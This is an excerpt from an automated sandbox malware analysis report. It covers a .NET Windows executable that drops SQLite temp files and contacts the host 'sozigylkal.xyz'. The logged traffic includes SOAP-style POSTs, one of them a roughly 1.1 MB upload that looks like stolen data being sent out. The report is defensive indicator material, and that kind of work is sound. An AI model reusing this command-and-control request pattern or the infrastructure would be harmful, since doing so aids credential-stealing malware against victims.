C:\Users\user\AppData\Local\Temp\tmpB93.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\tmpB94.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\tmpB95.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\tmpBC5.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\tmpD103.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\tmpD104.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7 CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\tmpD105.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001

Copyright Joe Security LLC 2021 Page 16 of 23 C:\Users\user\AppData\Local\Temp\tmpD105.tmp Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7 CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\tmpD106.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7 CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\tmpD136.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7 CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\tmpD137.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C

Copyright Joe Security LLC 2021 Page 17 of 23 C:\Users\user\AppData\Local\Temp\tmpD137.tmp SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7 CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

Static File Info

General
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.178772447159369
TrID:
  Win32 Executable (generic) Net Framework (10011505/4) 49.98%
  Win32 Executable (generic) a (10002005/4) 49.93%
  Windows Screen Saver (13104/52) 0.07%
  Win16/32 Executable Delphi generic (2074/23) 0.01%
  Generic Win/DOS Executable (2004/3) 0.01%
File name: 3jdkEgyWkk.exe
File size: 1867800
MD5: ca1a62feb27816580db61309ab443a61
SHA1: 81464d4f737875e4a8b7f45340d0e4a3729f92ce
SHA256: f7b9325ac03957eaeadea70155fa1ab9f2df37a07af9414665b8f79c8249ee64
SHA512: e89772e0ede5da977da1f6b074a31fd7240615dd24425ca606981e4ac1ea126ccb4d2ac3e6a70fc5c77812ae4da7eaa52f728fc2db63a38a5d99e2c8039a0372
SSDEEP: 24576:4P4O1brwerQIWONYxBqSOF7nndOLwfAyX0gV2ozVwTGhPGEd:y5rweFWONYxcSM7n5kh2VwTgv
File Content Preview: MZ...... @...... !..L.!This program cannot be run in DOS mode....$...... PE..L.... -y...... t...... @...... 4.... @......

File Icon

Icon Hash: e0c6a65225a2c6e0

Static PE Info

General
Entrypoint: 0x430c1e
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0xD9792DDE [Tue Aug 14 03:17:50 2085 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid: false
Signature Issuer: CN=Bosch S6 AGM/ AGM
Signature Validation Error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number: -2146762487
Not Before, Not After: 6/23/2021 12:12:06 PM, 6/24/2031 12:12:06 PM
Subject Chain: CN=Bosch S6 AGM/S5 AGM
Version: 3
Thumbprint MD5: FF4F98DAED8361E8F8911C7EB349C398
Thumbprint SHA-1: 6874402A4B779CA08D0D02261792C9DBEC5F0C52
Thumbprint SHA-256: C2A539F20ADA8C6DC84F8092BB9D8F0D8424683833CC6B07FBC01CCFDF0546FE
Serial: 1F863B470D9CA19A44E8D97CC1BCBF32

Entrypoint Preview

Data Directories

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
.text   0x2000           0x2ec24       0x2ee00   False     0.483463541667   data       6.262205754      IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.sdata  0x32000          0xeba         0x1000    False     0.44384765625    data       4.13930438754    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc   0x34000          0x19617c      0x196200  False     0.581822652162   data       7.17608088618    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x1cc000         0xc           0x200     False     0.044921875      data       0.0815394123432  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID        Message                                       Source Port  Dest Port  Source IP    Dest IP
06/25/21-09:37:11.675248  TCP       100000122  COMMUNITY WEB-MISC mod_jrun overflow attempt  49733        80         192.168.2.3  212.80.219.75
06/25/21-09:37:12.604529  TCP       100000122  COMMUNITY WEB-MISC mod_jrun overflow attempt  49733        80         192.168.2.3  212.80.219.75
06/25/21-09:37:12.604654  TCP       100000122  COMMUNITY WEB-MISC mod_jrun overflow attempt  49733        80         192.168.2.3  212.80.219.75
06/25/21-09:37:12.604738  TCP       100000122  COMMUNITY WEB-MISC mod_jrun overflow attempt  49733        80         192.168.2.3  212.80.219.75
06/25/21-09:37:12.604833  TCP       100000122  COMMUNITY WEB-MISC mod_jrun overflow attempt  49733        80         192.168.2.3  212.80.219.75

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name            Type            Class
Jun 25, 2021 09:35:22.656025887 CEST  192.168.2.3  8.8.8.8  0x7f42    Standard query (0)  sozigylkal.xyz  A (IP address)  IN (0x0001)
Jun 25, 2021 09:35:25.065288067 CEST  192.168.2.3  8.8.8.8  0x36aa    Standard query (0)  api.ip.sb       A (IP address)  IN (0x0001)
Jun 25, 2021 09:35:25.133012056 CEST  192.168.2.3  8.8.8.8  0x7dd5    Standard query (0)  api.ip.sb       A (IP address)  IN (0x0001)
Jun 25, 2021 09:37:10.178442955 CEST  192.168.2.3  8.8.8.8  0xe740    Standard query (0)  sozigylkal.xyz  A (IP address)  IN (0x0001)

DNS Answers

Timestamp                           Source IP  Dest IP      Trans ID  Reply Code    Name                      CName                                 Address        Type                    Class
Jun 25, 2021 09:35:22.715095997 CEST  8.8.8.8    192.168.2.3  0x7f42    No error (0)  sozigylkal.xyz                                                  212.80.219.75  A (IP address)          IN (0x0001)
Jun 25, 2021 09:35:25.124619961 CEST  8.8.8.8    192.168.2.3  0x36aa    No error (0)  api.ip.sb                 api.ip.sb.cdn.cloudflare.net                         CNAME (Canonical name)  IN (0x0001)
Jun 25, 2021 09:35:25.188754082 CEST  8.8.8.8    192.168.2.3  0x7dd5    No error (0)  api.ip.sb                 api.ip.sb.cdn.cloudflare.net                         CNAME (Canonical name)  IN (0x0001)
Jun 25, 2021 09:37:10.245373011 CEST  8.8.8.8    192.168.2.3  0xe740    No error (0)  sozigylkal.xyz                                                  212.80.219.75  A (IP address)          IN (0x0001)
Jun 25, 2021 09:37:11.397559881 CEST  8.8.8.8    192.168.2.3  0xde0     No error (0)  prda.aadg.msidentity.com  www.tm.a.prd.aadg.trafficmanager.net                 CNAME (Canonical name)  IN (0x0001)

HTTP Request Dependency Graph

sozigylkal.xyz

HTTP Packets

Session ID: 0
Source IP: 192.168.2.3
Source Port: 49723
Destination IP: 212.80.219.75
Destination Port: 80
Process: C:\Users\user\Desktop\3jdkEgyWkk.exe

Timestamp: Jun 25, 2021 09:35:23.034172058 CEST
kBytes transferred: 1044
Direction: OUT
Data:
POST / HTTP/1.1
Content-Type: text/; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: sozigylkal.xyz
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Timestamp: Jun 25, 2021 09:35:23.079916000 CEST
kBytes transferred: 1044
Direction: IN
Data:
HTTP/1.1 100 Continue

Timestamp: Jun 25, 2021 09:35:23.242171049 CEST
kBytes transferred: 1046
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 25 Jun 2021 07:35:23 GMT
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
Content-Encoding: gzip
Data Raw: 33 64 39 0d 0a 1f 8b 08 00 00 00 00 00 02 03 bd 58 6d 8f e2 36 10 fe 2b 11 d2 4a 57 74 4b b8 6e bb 3d 21 0e 89 97 40 51 97 5d 8e 70 7b ad 94 2f c6 99 25 2e 8e 27 b2 9d 0d ac ee c7 d7 09 09 77 2c d7 aa c4 b4 12 22 f1 8c e7 c9 78 3c 1e 3f 76 57 75 3c f1 0c 1c 13 70 b6 31 17 aa a3 3e 34 22 ad 93 8e eb 2a 1a 41 4c 54 cb c8 15 92 a4 85 72 ed e6 2f 2e 94 16 6e a3 d7 55 9d 01 86 bb 5e 77 02 ba 2f d7 69 0c 42 ab 05 a8 04 85 2a 11 0f 78 1a e2 24 95 ac c0 69 9c 58 a4 5c 97 1e 90 0f 8d 81 c4 4c 81 f4 b6 1a 84 62 28 1a a5 8a 1d c0 b2 2c 6b 65 37 05 d6 8f ed f6 3b f7 f7 d9 9d 5f f8 7b cd 84 d2 44 50 30 9f 20 9d 01 47 ba 81 70 88 a9 d0 72 57 a2 ac 4e 86 18 33 2a 51 e1 93 6e 51 8c 73 c0 1b f7 5d db f5 41 32 c2 d9 0b d1 c6 05 b7 2f 25 d9 a9 86 fb 0d ec 74 7e 31 c4 87 d5 9f 40 f5 4f 3d 2d 53 e8 ba 5f db 07 d5 ed 2b d5 6d ae f2 29 11 65 ac d4 41 7f 24 2c 3b 0d 23 89 31 54 d2 39 d1 91 ba 84 eb bd ee aa a3 b4 64 62 dd bb fa e4 7b 8b f9 e2 61 3c bd f3 ae 82 7e 92 8c 88 26 c1 1d 52 c2 83 01 d1 9a 43 4b 80 ee ba 07 83 7f 67 5a 38 ce d2 38 f8 64 1c 77 72 c5 d9 10 13 c4 35 87 3d 12 58 e3 bc d9 be bf fd c1 06 6c 81 24 36 da e0 21 01 49 1c df c4 39 23 12 82 b3 dd 99 91 84 83 af d3 90 61 e9 ce 9c a7 ca 62 7c 53 c9 42 bb 48 ff e2 6b 22 cb ff fa 28 43 53 11 ca 4c b5 41 89 20 44 6d 01 f0 c8 9e 09 0f 99 05 c2 6f 66 4e 4c a3 3e 80 c7 a1 28 8f 8e 7d 38 bc 84 51 67 2e cd 98 e8 ee 02 70 e9 10 5f 66 10 32 33 3a 49 84 05 d0 18 84 64 d2 99 0a 1a f8 1c 58 22 98 fc 39 50 a0 75 be 44 62 0c 53 0e ea 50 04 1e 19 64 20 cf 4f 05 f3 ca 99 20 13 89 69 12 0c 99 b1 40 9b cc 42 cc 50 54 8f fa 38 9c c1 8a d8 38 f2 d1 ec 3f 7e 2a 9f 2c 20 1e e4 8a 69 ab 35 3f 44 33 4b 18 8c 24 59 5b 45 a3 1f b3 f5 3e 18 16 20 4b 94 34 b2 b0 ff 83 88 10 b6 e5 e3 02 35 68 1f 9b fa 00 37 b7 ed ca 0b 7b 6f 66 64 ab 23 14 37 36 15 ed 7a 66 98 9f cd 34 fb 49 aa 05 db 1c 9e f5 91 ee 19 b5 dd d1 87 48 cd ef 02 a1 b5 2c 82 45 7d b3 cb 94 19 61 bc b5 48 83 be 46 9b d5 3c 90 e4 19 0e 9c a4 68 5d 5f 20 f3 2a 46 19 78 e1 da 66 c2 ee 1f a7 a3 69 df 19 a2 4c 50 16 4c b4 12 4d 60 6c d6 3e 38 de d6 d0 2a 06 86 ff 9f 9f 9a 1a 48 7c fe dc c9 5d a2 71 49 56 ff bc ab ba 7f cb c3 2b 8a 3e 62 8a a2 0c 8f 68 7c 25 2b bb 8c 97 f3 23 75 de ae 54 cc 6c 94 c7 ca 42 f2 ad fa 3f a1 fd a9 19 48 22 f1 c9 7c e0 2a 18 81 da 68 4c be 34 5b 7a ab df 36 5b 21 d2 e6 db e6 06 76 e6 3f 23 9c 83 36 2f 0a 20 6c 7e 69 7f 3f d2 c7 70 48 f7 e7 c3 b3 01 dd d7 c3 ae 02 31 01 ba c1 ff ff 1c 54 91 fe 19 be 30 ce 49 30 66 12 9e 70 5b e3 d8 f0 99 68 90 f5 4c 8b ea 0d 28 6a 98 2e a3 d4 6c 89 86 2c c8 b0 86 75 b9 0f 4e 29 ec 69 42 0d 88 f7 09 d0 ad 2a 4e 3b 86 0f ee 56 75 63 70 ef 2d 27 fd a5 e7 2c 81 46 02 39 ae 99 e1 97 03 4e e8 e6 57 92 d5 c0 9b 21 0a 1a 31 1e 1a 72 6d d8 2a cd b3 42 05 73 c2 c1 c9 55 df c9 c9 d3 0c ac 72 d3 a7 12 40 1c 2d e2 52 54 75 c8 2b d4 b1 be 90 94 ea a5 99 dd b5 7c d5 e3 20 2c 3b 3d ce ef 8f f4 79 bb 54 7d 2e 16 d4 71 15 a9 64 5d f7 f4 be e6 54 58 5c fb 18 71 75 2b e4 7e bd 5e ea fd 05 21 da 59 98 6b 12 00 00 0d 0a 30 0d 0a 0d 0a
Data Ascii: 3d9Xm6+JWtKn=!@Q]p{/%.'w,"x4"*ALTr/.nU^w/iB*x$iX\Lb(,ke7;_{DP0 GprWN3*QnQs]A2/% t~1@O=-S_+m)eA$,;#1T9db{a<~&RCKgZ88dwr5=Xl$6!I9#ab|SBHk"(CSLA DmofNL>(}8Qg.p_f23:IdX"9PuDbSPd O i@BPT88?~*, i5?D3K$Y[E> K45h7{ofd#76zf4IH,E}aHF8*H|]qIV+>bh|%+#uTlB?H"|*hL4[z6[!v?#6/ l~i? pH1T0I0fp[hL(j.l,uN)iB*N;Vucp-',F9NW!1rm*BsUr@-RTu+| ,;=yT}.qd]TX\qu+~^!Yk0

Session ID: 1
Source IP: 192.168.2.3
Source Port: 49733
Destination IP: 212.80.219.75
Destination Port: 80
Process: C:\Users\user\Desktop\3jdkEgyWkk.exe

Timestamp: Jun 25, 2021 09:37:10.304205894 CEST
kBytes transferred: 1138
Direction: OUT
Data:
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
Host: sozigylkal.xyz
Content-Length: 1128197
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Timestamp: Jun 25, 2021 09:37:10.349703074 CEST
kBytes transferred: 1139
Direction: IN
Data:
HTTP/1.1 100 Continue

Timestamp: Jun 25, 2021 09:37:11.308943987 CEST
kBytes transferred: 2265
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 25 Jun 2021 07:37:11 GMT
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
Content-Encoding: gzip
Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 02 03 45 ce cd 0a 83 30 10 04 e0 57 29 79 00 f7 1e d2 1c 0a 7d 01 0b bd 07 bb fe 80 c9 6e 33 51 ea db b7 8a d5 db 30 30 1f e3 60 ef 69 e6 51 94 2f 9f 38 26 58 5c 4d 5f 8a 5a 22 34 3d c7 80 ea d7 43 82 56 92 3b 5a 03 f1 be 20 e3 1d ec 4d 5e 8b 77 4f ce 43 bb 3c 9a 90 6a 7e 4f 8c 52 33 54 12 76 f6 40 0b 47 9d f2 b0 61 86 bc a3 3f 40 e7 13 ff 05 5c 3b 8e 2a 96 00 00 00 0d 0a 30 0d 0a 0d 0a
Data Ascii: 83E0W)y}n3Q00`iQ/8&X\M_Z"4=CV;Z M^wOC

Timestamp: Jun 25, 2021 09:37:13.204968929 CEST
kBytes transferred: 3867
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 25 Jun 2021 07:37:13 GMT
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
Content-Encoding: gzip
Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 02 03 65 8f c1 0a c2 30 0c 86 5f 45 7a 77 99 7a 2b 5d 0f 03 f1 a2 17 45 f0 5a b6 e0 0a 5b 5b 96 cc ce b7 77 8e 3a 41 6f e1 4f f2 e5 8b 22 b9 77 0f 6c 7d c0 d5 d8 b5 8e 24 15 a2 61 0e 12 80 aa 06 3b 43 d9 94 93 37 21 f3 fd 1d de 05 60 da 00 a1 15 c9 d2 d7 4f ad 0e c8 d7 50 1b 46 3a 23 05 ef 28 f1 16 1a 63 17 86 de ce 14 f1 33 3f b4 9c ae 9b 42 94 bd 8f 84 fd 7e 64 74 64 bd 13 a9 65 17 54 8c 31 8b bb 99 b4 cd f3 0d dc 4e c7 cb ec ba b6 8e d8 b8 0a 05 68 05 ff 4a 53 f8 f1 85 ef e3 fa 05 18 8f 8c 84 05 01 00 00 0d 0a 30 0d 0a 0d 0a
Data Ascii: b3e0_Ezwz+]EZ[[w:AoO"wl}$a;C7!`OPF:#(c3?B~dtdeT1NhJS0

Code Manipulations

Statistics

System Behavior

Analysis Process: 3jdkEgyWkk.exe PID: 256 Parent PID: 5792

General

Start time: 09:35:02
Start date: 25/06/2021
Path: C:\Users\user\Desktop\3jdkEgyWkk.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\3jdkEgyWkk.exe'
Imagebase: 0x230000
File size: 1867800 bytes
MD5 hash: CA1A62FEB27816580DB61309AB443A61
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: low

File Activities

File Created

File Deleted

File Read

Registry Activities

Disassembly

Code Analysis

Joe Sandbox Cloud Basic 32.0.0 Black Diamond
